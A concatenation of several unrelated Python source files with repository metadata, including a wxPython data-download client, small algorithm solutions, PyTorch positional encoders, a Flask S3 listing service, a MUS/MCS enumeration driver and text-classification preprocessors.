grid_sizer_2.AddGrowableRow(1)
grid_sizer_2.AddGrowableRow(2)
grid_sizer_2.AddGrowableCol(0)
grid_sizer_2.AddGrowableCol(1)
grid_sizer_2.AddGrowableCol(2)
grid_sizer_2.AddGrowableCol(3)
self.eaglidata_tab.SetSizer(sizer_1)
self.Layout()
# Give buttons dataset context
for b in [self.check_button, self.sample_button, self.download_button]:
b.dataset = "combined_images" # EAGL-I data
for b in [self.check_button_field, self.sample_button_field, self.download_button_field]:
b.dataset = "field_images" # Field data
self.Bind(wx.EVT_BUTTON, self.send_check_request, self.check_button)
self.Bind(wx.EVT_BUTTON, self.send_sample_request, self.sample_button)
self.Bind(wx.EVT_BUTTON, self.send_download_request, self.download_button)
self.Bind(wx.EVT_BUTTON, self.update_user_credentials, self.credentials_button)
self.Bind(wx.EVT_BUTTON, self.change_sample_path, self.sample_path_button)
self.Bind(wx.EVT_BUTTON, self.change_download_path, self.download_path_button)
self.Bind(wx.EVT_BUTTON, self.send_check_request, self.check_button_field)
self.Bind(wx.EVT_BUTTON, self.send_sample_request, self.sample_button_field)
self.Bind(wx.EVT_BUTTON, self.send_download_request, self.download_button_field)
# end wxGlade
# Load parameters from last session
try:
with open(JSON_LOCATION, 'r') as f:
self.parameters = json.load(f)
except FileNotFoundError:
self.username = ""
self.password = ""
os.mkdir("sample")
os.mkdir("download")
self.sample_dir = "./sample"
self.download_dir = "./download"
json_obj = {
"login": "",
"password": "",
"sample": "./sample",
"download": "./download"
}
with open(JSON_LOCATION, "w") as f:
json.dump(json_obj, f)
self.parameters = json_obj
self.username = self.parameters["login"]
self.password = self.parameters["password"]
# Load directory locations from last session
self.sample_dir = self.parameters["sample"]
self.download_dir = self.parameters["download"]
# Sample size
self.sample_size = SAMPLE_SIZE
# GUI-input package to be sent to commands
self.query_parameters = {}
self.eagli_parameters = {}
self.field_query_parameters = {}
self.gui_input = {}
# Initialize parameters
self.update_parameters()
# Login User with previously given credentials
data = login_cmd(
self.gui_input, password=self.parameters["password"]
)
self.update_gui(data)
# Get archive list
self.update_gui(update_archives_cmd(self.gui_input))
@bind_command(check_cmd)
def send_check_request(self, event): # wxGlade: Main.<event_handler>
pass
@bind_command(sample_cmd)
def send_sample_request(self, event): # wxGlade: Main.<event_handler>
pass
@bind_command(download_cmd)
def send_download_request(self, event): # wxGlade: Main.<event_handler>
pass
def update_user_credentials(self, event): # wxGlade: Main.<event_handler>
self.logger.info("Updating user credentials...")
username_dialog = wx.TextEntryDialog(
self, message="Username:"
)
if username_dialog.ShowModal() == wx.ID_OK:
password_dialog = wx.PasswordEntryDialog(
self, message="Password:"
)
if password_dialog.ShowModal() == wx.ID_OK:
self.username = username_dialog.GetValue()
self.password = password_dialog.GetValue()
password_dialog.Destroy()
username_dialog.Destroy()
self.update_parameters(write_json=True)
logout_cmd(self.gui_input)
# password passed as extra argument to not have it appear in log files
data = login_cmd(self.gui_input, password=self.password)
self.update_gui(data)
event.Skip()
def change_sample_path(self, event): # wxGlade: Main.<event_handler>
self.logger.info("Update path to sample folder...")
directory_dialog = wx.DirDialog(
self, message="Choose folder for sample preview"
)
if directory_dialog.ShowModal() == wx.ID_OK:
self.sample_dir = directory_dialog.GetPath()
directory_dialog.Destroy()
self.update_parameters(write_json=True)
event.Skip()
def change_download_path(self, event): # wxGlade: Main.<event_handler>
self.logger.info("Update path to download folder...")
directory_dialog = wx.DirDialog(
self, message="Choose download folder"
)
if directory_dialog.ShowModal() == wx.ID_OK:
self.download_dir = directory_dialog.GetPath()
directory_dialog.Destroy()
self.update_parameters(write_json=True)
event.Skip()
def update_parameters(self, event=None, write_json=False):
self.logger.info("Updating client parameters")
if write_json:
with open("./parameters.json", "w") as f:
json.dump({
"login": self.username,
"password": self.password,
"download": self.download_dir,
"sample": self.sample_dir}, f
)
self.eagli_parameters = {
"start_date": self._wxdate2pydate(self.datepicker_start_date.GetValue()),
"end_date": self._wxdate2pydate(self.datepicker_end_date.GetValue()),
"min_age": self.spin_age_min.GetValue(),
"max_age": self.spin_age_max.GetValue(),
"plants": list(self.check_list_plants.GetCheckedStrings()),
"plant_id": self.text_plant_id.GetValue(),
"min_res": self.spin_resolution_min.GetValue(),
"max_res": self.spin_resolution_max.GetValue(),
"single_plant_output": self.checkbox_single_plant_images.GetValue(), # True/False
"multiple_plant_output": self.checkbox_multiple_plant_images.GetValue(),
"bounding_box_output": self.checkbox_bounding_box_images.GetValue(),
"json_output": self.checkbox_json_files.GetValue(),
"archive_selection": self.combo_box_archived_queries.GetValue(),
"perspectives": self.perspective_box.GetStringSelection(),
}
self.field_query_parameters = {
"start_date": self._wxdate2pydate(self.datepicker_start_date_field.GetValue()),
"end_date": self._wxdate2pydate(self.datepicker_end_date_field.GetValue()),
"plants": list(self.check_list_plants_field.GetCheckedStrings()),
"archive_selection": self.combo_box_archived_queries_field.GetValue(),
}
self.gui_input = {
"username": self.username,
"query_parameters": {
"eagli_parameters": self.eagli_parameters,
"field_parameters": self.field_query_parameters
},
"sample_size": self.sample_size,
"sample_dir": self.sample_dir,
"download_dir": self.download_dir,
}
if event:
self.gui_input["dataset"] = event.GetEventObject().dataset
else:
self.gui_input["dataset"] = ""
def update_gui(self, gui_output):
if "message" in gui_output.keys():
self.result_label.SetLabelText(gui_output["message"])
self.result_label_field.SetLabelText(gui_output["message"])
if "error" in gui_output.keys():
msg = self.result_label.Label
self.result_label.SetLabelText(msg + " Error: " + gui_output["error"])
self.result_label_field.SetLabelText(msg + " Error: " + gui_output["error"])
if "archive_list" in gui_output.keys():
collections_list = {
"combined_images": {
"combobox": self.combo_box_archived_queries,
"archives": [],
"tab": self.eaglidata_tab,
"JSON_name": "eagli_archives"
},
"field_images": {
"combobox": self.combo_box_archived_queries_field,
"archives": [],
"tab": self.fielddata_tab,
"JSON_name": "field_archives"
},
}
# Split archive list by collection
for row in gui_output["archive_list"]:
for data_type in collections_list.keys():
if row[2] == data_type:
collections_list[data_type]["archives"].append(row)
# Update Comboboxes
for collection in collections_list.values():
collection["combobox"].Clear()
collection["combobox"].AppendItems([""])
collection["combobox"].AppendItems([
row[1] + f" ({row[-1]} GB)" for row in collection["archives"]
])
self.Update()
# Update JSON-Files
with open("metadata.json", "r") as f:
self.logger.info("Updating metadata.json")
old_metadata = json.load(f)
for collection in collections_list.values():
old_metadata[collection["JSON_name"]] = [
row[1] + f" ({row[-1]} GB)" for row in collection["archives"]
]
with open("metadata.json", "w") as f:
json.dump(old_metadata, f)
@staticmethod
def _wxdate2pydate(wx_date):
f = wx_date.Format('%d/%m/%y %H:%M:%S')
return datetime.datetime.strptime(f, '%d/%m/%y %H:%M:%S')
# end of class Main
class LicenseDialog(wx.Dialog):
def __init__(self, *args, **kwds):
# begin wxGlade: MyDialog.__init__
kwds["style"] = kwds.get("style", 0) | wx.DEFAULT_DIALOG_STYLE
wx.Dialog.__init__(self, *args, **kwds)
self.SetTitle("License Agreement")
sizer_1 = wx.BoxSizer(wx.VERTICAL)
with open("license.txt", "r") as f:
lines = f.read()
label_1 = wx.StaticText(self, wx.ID_ANY, lines)
sizer_1.Add(label_1, 0, wx.LEFT | wx.RIGHT, 10)
self.agree_box = wx.CheckBox(self, wx.ID_ANY, "I agree to the above license and terms of usage.")
sizer_1.Add(self.agree_box, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALL, 10)
sizer_2 = wx.StdDialogButtonSizer()
sizer_1.Add(sizer_2, 0, wx.ALIGN_RIGHT | wx.ALL, 4)
self.button_OK = wx.Button(self, wx.ID_OK, "")
self.button_OK.Enable(False)
self.button_OK.SetDefault()
self.agreed = False
sizer_2.AddButton(self.button_OK)
self.button_CANCEL = wx.Button(self, wx.ID_CANCEL, "")
sizer_2.AddButton(self.button_CANCEL)
sizer_2.Realize()
self.SetSizer(sizer_1)
sizer_1.Fit(self)
self.SetAffirmativeId(self.button_OK.GetId())
self.SetEscapeId(self.button_CANCEL.GetId())
self.Layout()
self.Bind(wx.EVT_CHECKBOX, self.enable_ok, self.agree_box)
# end wxGlade
def enable_ok(self, event): # wxGlade: MyDialog.<event_handler>
self.agreed = not self.agreed
self.button_OK.Enable(self.agreed)
event.Skip()
# end of class MyDialog
# noinspection PyAttributeOutsideInit
class TerraByteClient(wx.App):
def OnInit(self):
self.frame = Main(None, wx.ID_ANY, "")
try:
self.SetTopWindow(self.frame)
except RuntimeError:
print("License must be agreed to")
return True
self.frame.Show()
return True
# end of class TerraByteClient
if __name__ == "__main__":
TerraByte_Client = TerraByteClient(0)
TerraByte_Client.MainLoop()
| UWDigitalAg/TerraByte_Client | client_app.py | client_app.py | py | 27,873 | python | en | code | 2 | github-code | 50 |
20935625661 | # -*- coding:utf-8 -*-
class Solution:
# 这里要特别注意~找到任意重复的一个值并赋值到duplication[0]
# 函数返回True/False
def duplicate(self, numbers, duplication):
# write code here
flag = [0 for _ in range(len(numbers))]
for i in range(len(numbers)):
if flag[numbers[i]] != 0:
duplication[0] = numbers[i]
return True
else:
flag[numbers[i]] += 1
return False
| Jason-Woo/leetcode_problemset | jz_problemset/jz50/code.py | code.py | py | 499 | python | en | code | 0 | github-code | 50 |
72611241114 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from astlib.tensor_utils.analyze import level
class PositionalEncoder(nn.Module):
def __init__(self, d_model, max_len=5000):
super(PositionalEncoder, self).__init__()
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(
torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model)
)
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0).transpose(0, 1)
self.register_buffer("pe", pe)
def forward(self, x):
""" x should have dimensions [N, B, D] """
x = x + self.pe[: x.size(0), :]
return x
class LevelPositionalEmbedding(nn.Module):
def __init__(self, embedding_dim: int, num_embeddings: int = 200):
super().__init__()
self.num_embeddings = num_embeddings
self.embedding_dim = embedding_dim
self.pos_embedding = nn.Embedding(num_embeddings, embedding_dim, padding_idx=0)
def forward(self, x, node_incidences):
"""
x should have dimensions [N, B, D]
num_descendants is expected to be of size [B x N x N].
"""
# root has level 0 and padding tokens should have level -1
levels = level(node_incidences) # [B, N]
levels += 1 # shift everything so that padding tokens have level 0
levels = levels.t() # [N, B]
x = x + self.pos_embedding(levels) # [N, B, D]
return x
| haseebs/semantic-code-search | encoders/positional_encoder.py | positional_encoder.py | py | 1,635 | python | en | code | 4 | github-code | 50 |
11226024856 | from bitarray import bitarray
def compute_if_absent(some_dict, key, default_value_func):
key_value = some_dict.get(key)
if key_value is None:
key_value = default_value_func()
some_dict[key] = key_value
return key_value
def get_from_multi_level_dict(some_dict, keys):
current_dict = some_dict
for key in keys:
current_dict = current_dict.get(key)
if current_dict is None:
return None
return current_dict
def init_bitset(length):
bitset = bitarray(length)
bitset.setall(0)
return bitset
def print_multi_level_dict(some_dict, padding=0):
for key, value in some_dict.items():
print(' '*padding + str(key))
if type(value) == dict:
print_multi_level_dict(value, padding + 2)
else:
print(' '*(padding+2) + str(value)) | yestinchen/star_retrieval | vsimsearch/utils.py | utils.py | py | 781 | python | en | code | 0 | github-code | 50 |
45828721608 | from os import environ
import boto3
from flask import Blueprint, jsonify
from flask_api import status
BUCKET_NAME = environ.get("BUCKET_NAME")
AWS_ENDPOINT = environ.get("AWS_ENDPOINT")
service = Blueprint("service", __name__)
@service.route("/")
def healthcheck():
return "Healthy", status.HTTP_200_OK
@service.route("/objects")
def list_objects():
s3_client = boto3.client("s3", endpoint_url=AWS_ENDPOINT)
try:
response = s3_client.list_objects(Bucket=BUCKET_NAME)
except Exception as exc:
return f"Error: {exc}", status.HTTP_500_INTERNAL_SERVER_ERROR
return jsonify(response.get("Contents", {})), status.HTTP_200_OK
| jim-sheldon/Flask-localstack | service/handlers.py | handlers.py | py | 663 | python | en | code | 0 | github-code | 50 |
38460413370 | import numpy as np
from PIL import Image, ImageDraw
def create_go_board_image(board, file_path):
# Define the colors for the stones and empty positions
black_stone = (0, 0, 0)
white_stone = (255, 255, 255)
empty_pos = (222, 184, 135)
# Create a blank image for the board
img_size = board.shape[0] * 50
img = Image.new('RGB', (img_size, img_size), (222, 184, 135))
# Draw the lines for the board
for i in range(board.shape[0]):
x0, y0, x1, y1 = i*50, 0, i*50, img_size
draw = ImageDraw.Draw(img)
draw.line((x0, y0, x1, y1), fill=(0, 0, 0), width=2)
draw.line((y0, x0, y1, x1), fill=(0, 0, 0), width=2)
# Add the stones to the board
for i in range(board.shape[0]):
for j in range(board.shape[1]):
if board[i, j] == 0:
color = black_stone
elif board[i, j] == 1:
color = white_stone
else:
continue
x, y = i*50, j*50
draw = ImageDraw.Draw(img)
draw.ellipse((x-25, y-25, x+25, y+25), fill=color, outline=(0, 0, 0), width=2)
if file_path is not None:
img.save(file_path)
return img
| Jiankun-Huang/JBX-Go | modules/visualize.py | visualize.py | py | 1,225 | python | en | code | 1 | github-code | 50 |
25900615154 | #!/usr/bin/env python
import argparse
import atexit
import signal
import sys
import threading
import utils
import mapsolvers
import CNFsolvers
from MarcoPolo import MarcoPolo
def parse_args():
parser = argparse.ArgumentParser()
# Standard arguments
parser.add_argument('infile', nargs='?', type=argparse.FileType('rb'),
default=sys.stdin,
help="name of file to process (STDIN if omitted)")
parser.add_argument('-v', '--verbose', action='count',
help="print more verbose output (constraint indexes for MUSes/MCSes) -- repeat the flag for detail about the algorithm's progress)")
parser.add_argument('-a', '--alltimes', action='store_true',
help="print the time for every output")
parser.add_argument('-s', '--stats', action='store_true',
help="print timing statistics to stderr")
parser.add_argument('-T', '--timeout', type=int, default=None,
help="limit the runtime to TIMEOUT seconds")
parser.add_argument('-l', '--limit', type=int, default=None,
help="limit number of subsets output (counting both MCSes and MUSes)")
type_group = parser.add_mutually_exclusive_group()
type_group.add_argument('--cnf', action='store_true',
help="assume input is in DIMACS CNF or Group CNF format (autodetected if filename is *.[g]cnf or *.[g]cnf.gz).")
type_group.add_argument('--smt', action='store_true',
help="assume input is in SMT2 format (autodetected if filename is *.smt2).")
parser.add_argument('-b', '--bias', type=str, choices=['MUSes', 'MCSes'], default='MUSes',
help="bias the search toward MUSes or MCSes early in the execution [default: MUSes] -- all will be enumerated eventually; this just uses heuristics to find more of one or the other early in the enumeration.")
# Experimental / Research arguments
exp_group = parser.add_argument_group('Experimental / research options', "These can typically be ignored; the defaults will give the best performance.")
exp_group.add_argument('--mssguided', action='store_true',
help="check for unexplored subsets in immediate supersets of any MSS found")
exp_group.add_argument('--ignore-implies', action='store_true',
help="do not use implied literals from Map as hard constraints")
exp_group.add_argument('--dump-map', nargs='?', type=argparse.FileType('w'),
help="dump clauses added to the Map formula to the given file.")
exp_group.add_argument('--block-both', action='store_true',
help="block both directions from the result type of interest (i.e., block subsets of MUSes for --bias high, etc.)")
exp_group.add_argument('--force-minisat', action='store_true',
help="use Minisat in place of MUSer2 for CNF (NOTE: much slower and usually not worth doing!)")
# Max/min-models arguments
max_group_outer = parser.add_argument_group(' Maximal/minimal models options', "By default, the Map solver will efficiently produce maximal/minimal models itself by giving each variable a default polarity. These options override that (--nomax, -m) or extend it (-M, --smus) in various ways.")
max_group = max_group_outer.add_mutually_exclusive_group()
max_group.add_argument('--nomax', action='store_true',
help="perform no model maximization whatsoever (applies either shrink() or grow() to all seeds)")
max_group.add_argument('-m', '--max', type=str, choices=['always', 'half'], default=None,
help="get a random seed from the Map solver initially, then compute a maximal/minimal model (for bias of MUSes/MCSes, resp.) for all seeds ['always'] or only when initial seed doesn't match the --bias ['half'] (i.e., seed is SAT and bias is MUSes)")
max_group.add_argument('-M', '--MAX', action='store_true', default=None,
help="computes a maximum/minimum model (of largest/smallest cardinality) (uses MiniCard as Map solver)")
max_group.add_argument('--smus', action='store_true',
help="calculate an SMUS (smallest MUS) (uses MiniCard as Map solver)")
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
if args.smt and args.infile == sys.stdin:
sys.stderr.write("SMT cannot be read from STDIN. Please specify a filename.\n")
sys.exit(1)
return args
def at_exit(stats):
# print stats
times = stats.get_times()
counts = stats.get_counts()
other = stats.get_stats()
# sort categories by total runtime
categories = sorted(times, key=times.get)
maxlen = max(len(x) for x in categories)
for category in categories:
sys.stderr.write("%-*s : %8.3f\n" % (maxlen, category, times[category]))
for category in categories:
if category in counts:
sys.stderr.write("%-*s : %8d\n" % (maxlen + 6, category + ' count', counts[category]))
sys.stderr.write("%-*s : %8.5f\n" % (maxlen + 6, category + ' per', times[category] / counts[category]))
# print min, max, avg of other values recorded
if other:
maxlen = max(len(x) for x in other)
for name, values in other.items():
sys.stderr.write("%-*s : %f\n" % (maxlen + 4, name + ' min', min(values)))
sys.stderr.write("%-*s : %f\n" % (maxlen + 4, name + ' max', max(values)))
sys.stderr.write("%-*s : %f\n" % (maxlen + 4, name + ' avg', sum(values) / float(len(values))))
def setup_execution(args, stats):
# register timeout/interrupt handler
def handler(signum, frame):
if signum == signal.SIGALRM:
sys.stderr.write("Time limit reached.\n")
else:
sys.stderr.write("Interrupted.\n")
sys.exit(128)
# at_exit will fire here
signal.signal(signal.SIGTERM, handler) # external termination
signal.signal(signal.SIGINT, handler) # ctl-c keyboard interrupt
# register a timeout alarm, if needed
if args.timeout:
signal.signal(signal.SIGALRM, handler) # timeout alarm
signal.alarm(args.timeout)
# register at_exit to print stats when program exits
if args.stats:
atexit.register(at_exit, stats)
def setup_solvers(args):
infile = args.infile
# create appropriate constraint solver
if args.cnf or infile.name.endswith('.cnf') or infile.name.endswith('.cnf.gz') or infile.name.endswith('.gcnf') or infile.name.endswith('.gcnf.gz'):
if args.force_minisat:
try:
csolver = CNFsolvers.MinisatSubsetSolver(infile)
except OSError as e:
sys.stderr.write("[31;1mERROR:[m Unable to load pyminisolvers library.\n[33mRun 'make -C pyminisolvers' to compile the library.[m\n\n")
sys.stderr.write(str(e) + "\n")
sys.exit(1)
else:
try:
csolver = CNFsolvers.MUSerSubsetSolver(infile)
except CNFsolvers.MUSerException as e:
sys.stderr.write("[31;1mERROR:[m Unable to use MUSer2 for MUS extraction.\n[33mUse --force-minisat to use Minisat instead[m (NOTE: it will be much slower.)\n\n")
sys.stderr.write(str(e) + "\n")
sys.exit(1)
except OSError as e:
sys.stderr.write("[31;1mERROR:[m Unable to load pyminisolvers library.\n[33mRun 'make -C pyminisolvers' to compile the library.[m\n\n")
sys.stderr.write(str(e) + "\n")
sys.exit(1)
infile.close()
elif args.smt or infile.name.endswith('.smt2'):
try:
from SMTsolvers import Z3SubsetSolver
except ImportError as e:
sys.stderr.write("ERROR: Unable to import z3 module: %s\n\nPlease install Z3 from https://z3.codeplex.com/\n" % str(e))
sys.exit(1)
# z3 has to be given a filename, not a file object, so close infile and just pass its name
infile.close()
csolver = Z3SubsetSolver(infile.name)
else:
sys.stderr.write(
"Cannot determine filetype (cnf or smt) of input: %s\n"
"Please provide --cnf or --smt option.\n" % infile.name
)
sys.exit(1)
# create appropriate map solver
if args.nomax or args.max:
varbias = None # will get a "random" seed from the Map solver
else:
varbias = (args.bias == 'MUSes') # High bias (True) for MUSes, low (False) for MCSes
try:
if args.MAX or args.smus:
msolver = mapsolvers.MinicardMapSolver(n=csolver.n, bias=varbias)
else:
msolver = mapsolvers.MinisatMapSolver(n=csolver.n, bias=varbias, dump=args.dump_map)
except OSError as e:
sys.stderr.write("[31;1mERROR:[m Unable to load pyminisolvers library.\n[33mRun 'make -C pyminisolvers' to compile the library.[m\n\n")
sys.stderr.write(str(e) + "\n")
sys.exit(1)
return (csolver, msolver)
def setup_config(args):
config = {}
config['bias'] = args.bias
config['smus'] = args.smus
if args.nomax:
config['maximize'] = 'none'
elif args.smus:
config['maximize'] = 'always'
elif args.max:
config['maximize'] = args.max
elif args.MAX:
config['maximize'] = 'solver'
else:
config['maximize'] = 'solver'
config['use_implies'] = not args.ignore_implies # default is to use them
config['mssguided'] = args.mssguided
config['block_both'] = args.block_both
config['verbose'] = args.verbose > 1
return config
def main():
stats = utils.Statistics()
with stats.time('setup'):
args = parse_args()
setup_execution(args, stats)
csolver, msolver = setup_solvers(args)
config = setup_config(args)
mp = MarcoPolo(csolver, msolver, stats, config)
# useful for timing just the parsing / setup
if args.limit == 0:
sys.stderr.write("Result limit reached.\n")
sys.exit(0)
# enumerate results in a separate thread so signal handling works while in C code
# ref: https://thisismiller.github.io/blog/CPython-Signal-Handling/
def enumerate():
remaining = args.limit
for result in mp.enumerate():
output = result[0]
if args.alltimes:
output = "%s %0.3f" % (output, stats.current_time())
if args.verbose:
output = "%s %s" % (output, " ".join([str(x + 1) for x in result[1]]))
print(output)
if remaining:
remaining -= 1
if remaining == 0:
sys.stderr.write("Result limit reached.\n")
sys.exit(0)
enumthread = threading.Thread(target=enumerate)
enumthread.daemon = True # so thread is killed when main thread exits (e.g. in signal handler)
enumthread.start()
enumthread.join(float("inf")) # timeout required for signal handler to work; set to infinity
if __name__ == '__main__':
main()
| batchenRothenberg/AllRepair | python/marco.py | marco.py | py | 11,275 | python | en | code | 8 | github-code | 50 |
26901819625 | import abc
from typing import List, Tuple
class ClassificationCorpusPreprocessor(abc.ABC):
'''
input: path to input file
return: list of tuples (class_no, class_name, text)
'''
@abc.abstractmethod
def preprocess(self, file_path:str)->List[Tuple[str, str, str]]:
pass
class TouTiaoNewsPreprocessor(ClassificationCorpusPreprocessor):
'''
https://github.com/skdjfla/toutiao-text-classfication-dataset.git
example of toutiaonews docs
_!_101_!_news_culture_!_林徽因什么理由拒绝了徐志摩而选择梁思 > 成为终身伴侣?_!_
6552475601595269390
_!_101_!_news_culture_!_黄杨木是什么树?_!_
6552387648126714125
_!_101_!_news_culture_!_上联:草根登上星光道,怎么对下联?_!_
6552271725814350087
_!_101_!_news_culture_!_什么是超写实绘画?_!_
6552452982015787268
_!_101_!_news_culture_!_松涛听雨莺婉转,下联?_!_
'''
def __init__(self):
self.delimeter = '_!_'
def preprocess(self, file_path:str) ->List[Tuple[str, str, str]]:
file = open(file_path, 'r')
res = []
for l in file.readlines():
toks = l.split(self.delimeter)
classno = toks[1]
classname = toks[2]
title = toks[3]
res.append((classno, classname, title))
return res
import json
class TravelReviewPreprocessor(ClassificationCorpusPreprocessor):
'''
https://github.com/lsvih/chinese-customer-review
{"s": "秀美恩施大峡谷,因其奇、险让人流连忘返。", "ot": "恩施大峡谷"}
{"s": "龙鳞宫说白了,就是用多种颜色的灯光打在石钟乳上,形成五光十色的视觉效果", "ot": "龙鳞宫"}
{"s": "回来百度方知道,舟山跨海大桥,又叫舟山大陆连岛工程,跨四座岛屿,翻九个涵>洞,穿两个隧道,全长四十八公里。", "ot": "舟山跨海大桥"}
{"s": " 旃檀林,又称“旃檀禅林”,位于九华街西南,背倚琵琶山,面朝化成寺。", "ot": "旃檀林"}
{"s": "在秦家大院,看着点点滴滴的一切,探寻着耐人寻味的过去。", "ot": "秦家大院"}
'''
def preprocess(self, file_path:str) ->List[Tuple[str, str, str]]:
file = open(file_path, 'r')
res = []
for l in file.readlines():
obj = json.loads(l)
classno = None
classname = obj['ot']
title = obj['s']
res.append((classno, classname, title))
return res
| shazi7804/aws-cdk-sagemaker-model-endpoints | app/nlp_processing/preprocess.py | preprocess.py | py | 2,563 | python | en | code | 1 | github-code | 50 |
27213230237 | #Returns a dictionary of types and their advantages.
#Also returns a dictionary of types and the file location to the label.
#These type_numbers are arbitrarily given to the types
#Its only for consistency
types = ["Normal","Fighting","Flying","Poison","Ground","Rock","Bug","Ghost","Steel","Fire","Water","Grass","Electric","Psychic","Ice","Dragon","Dark","Fairy"]
type_numbers=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18]
def createEffectivenessTypeless():
i = 0
advantages = {}
while i != 18:
advantages[types[i]] = 1
i = i + 1
print(advantages)
def createEffectiveness(lst):
i = 0
advantages = {}
while i != 18:
advantages[types[i]] = lst[i]
i = i + 1
print(advantages)
#Returns the file location for the type image
def returnImage(type):
jpgFiles = {"Typeless":'Type Labels\\typeless.jpg',"Normal": 'Type Labels\\normal.jpg',"Fighting":'Type Labels\\fighting.jpg' ,"Flying":'Type Labels\\flying.jpg' ,"Poison":'Type Labels\\poison.jpg' ,"Ground":'Type Labels\\ground.jpg' ,"Rock":'Type Labels\\rock.jpg' ,"Bug": 'Type Labels\\bug.jpg',"Ghost":'Type Labels\\ghost.jpg' ,"Steel":'Type Labels\\steel.jpg' ,"Fire":'Type Labels\\fire.jpg' ,"Water":'Type Labels\\water.jpg' ,"Grass":'Type Labels\\grass.jpg' ,"Electric":'Type Labels\\electric.jpg' ,"Psychic":'Type Labels\\psychic.jpg' ,"Ice":'Type Labels\\ice.jpg' ,"Dragon":'Type Labels\\dragon.jpg' ,"Dark":'Type Labels\\dark.jpg' ,"Fairy":'Type Labels\\fairy.jpg' }
return jpgFiles[type] | prenio/Type-Master | Type Master/TypeEffectiveness.py | TypeEffectiveness.py | py | 1,499 | python | en | code | 0 | github-code | 50 |
18661870882 | '''
Main utility functions
'''
import numpy as np
import tensorflow as tf
def preprocess_targets(targets, words2int, batch_size):
left_side = tf.fill([batch_size, 1], words2int['<SOS>'])
right_side = tf.strided_slice(targets, [0, 0], [batch_size, -1], [1, 1])
preprocessed_targets = tf.concat([left_side, right_side], 1)
return preprocessed_targets
def apply_padding(batch_of_sequences, words2int):
max_sequence_length = max([len(sequence) for sequence in batch_of_sequences])
return [sequence + [words2int['<PAD>']] * (max_sequence_length - len(sequence)) for sequence in batch_of_sequences]
def split_into_batches(questions, answers, questionswords2int, answerswords2int, batch_size):
for batch_index in range(0, len(questions) // batch_size):
start_index = batch_index * batch_size
questions_in_batch = questions[start_index : start_index + batch_size]
answers_in_batch = answers[start_index : start_index + batch_size]
padded_questions_in_batch = np.array(apply_padding(questions_in_batch, questionswords2int))
padded_answers_in_batch = np.array(apply_padding(answers_in_batch, answerswords2int))
yield padded_questions_in_batch, padded_answers_in_batch
def get_training_validation_data(questions, answers, validation_set_ratio):
training_validation_split = int(len(questions) * validation_set_ratio)
training_questions = questions[training_validation_split:]
training_answers = answers[training_validation_split:]
validation_questions = questions[:training_validation_split]
validation_answers = answers[:training_validation_split]
return (training_questions, training_answers, validation_questions, validation_answers)
| manikanthr5/OpenDomainChatbot | nlp_utils.py | nlp_utils.py | py | 1,730 | python | en | code | 11 | github-code | 50 |
14604091999 | #!/usr/bin/python
import os
import subprocess
import re
import shlex
files = [f for f in os.listdir('.') if os.path.isfile(f)]
cwd = os.getcwd()
replaced = re.sub(' ', '\ ', cwd)
homeworkfiles = []
homeworkdirectories = []
for f in files:
if f[0] == 'e':
homeworkfiles.append(f)
homeworkdirectories.append(f[0:8])
if not os.path.exists(cwd + '/' + f[0:8]):
os.makedirs(f[0:8])
for hwfile, hwdirectory in zip(homeworkfiles, homeworkdirectories):
args = "tar -xzvf " + hwfile + " -C " + hwdirectory
args = shlex.split(args)
p = subprocess.Popen(args)
p.wait() | elhanarinc/ceng495 | 495-hw3/untar.py | untar.py | py | 641 | python | en | code | 0 | github-code | 50 |
1500206109 | import sys
import pygame
from settings import Settings
from ship import Ship
def run_game():
# 初始化并创建屏幕对象
pygame.init()
screen = pygame.display.set_mode((1200,800))
pygame.display.set_caption("Alien Invasion")
# 创建一艘飞船
#背景色
# bg_color=(129,216,207)
# 开始游戏的主循环
while True:
# 监视键盘和鼠标事件
for event in pygame.event.get():
if event.type == pygame.QUIT:#?quit()and QUIT
sys.exit()
#
screen.fill(bg_color)
# 让最近绘制的屏幕可见
pygame.display.flip()
run_game() | swq90/python | exercise/alien_invasion/alien.py | alien.py | py | 656 | python | en | code | 0 | github-code | 50 |
34468730555 | """Read class metadata."""
import json
from typing import Iterable
import polars as pl
from polars.type_aliases import FrameType as FrameType
from mo.core import dtypes
from mo.core.interfaces import IReader
from mo.core.typing import PathStr
class ManifestReader(IReader):
"""Read page view data from a CSV."""
def __init__(self, status: str = "complete", class_type: str = "real") -> None:
super().__init__()
self.status = status
self.class_type = class_type
def __call__(self, input: PathStr) -> pl.LazyFrame:
"""Read a "complete list" classes manifest CSV file."""
return (
pl.scan_csv(input, dtypes=dtypes.manifest)
.filter(pl.col("class_id").is_not_null())
.filter(pl.col("status") == self.status)
.filter(pl.col("class_type") == self.class_type)
)
class ClassesReader(IReader):
"""Read page view data from a CSV."""
def __init__(self, status: str = "complete", class_type: str = "real") -> None:
super().__init__()
self.status = status
self.class_type = class_type
def __call__(self, input: PathStr) -> pl.LazyFrame:
"""Read a "classes.csv" CSV file from a data download."""
return (
pl.scan_csv(input, dtypes=dtypes.metadata)
.filter(pl.col("class_id").is_not_null())
.rename(
{
"teacher_id": "instructor_id",
"release": "version",
"course_name": "course",
"setup_yaml": "book_config",
}
)
.with_columns(
course=pl.when(pl.col("course") == "UCLATALL/czi-stats-course")
.then("Statistics and Data Science: A Modeling Approach")
.otherwise(pl.col("course"))
)
)
@staticmethod
def pages_from_setup(setup_yaml: str) -> Iterable[str]:
"""Parse a setup_yaml JSON string into a list of pages."""
try:
chapters = json.loads(setup_yaml)["chapters"]
assert isinstance(chapters, Iterable)
except (json.JSONDecodeError, KeyError, AssertionError):
chapters = []
pages: list[str] = []
for chapter in chapters: # type: ignore
if "pages" in chapter and isinstance(chapter["pages"], Iterable):
for page in chapter["pages"]: # type: ignore
if "name" in page:
assert isinstance(page["name"], str)
pages.append(page["name"]) # type: ignore
return pages # type: ignore
| coursekata/mo | mo/core/read/classes.py | classes.py | py | 2,663 | python | en | code | 0 | github-code | 50 |
32880893456 | # LEGB rules
# Local, enclosed, global and built_in
# Built-in Scope
from math import pi
pi = 15
def outer():
pi = 26
def inner():
# pi = 7
nonlocal pi
pi+=1
print(pi)
inner()
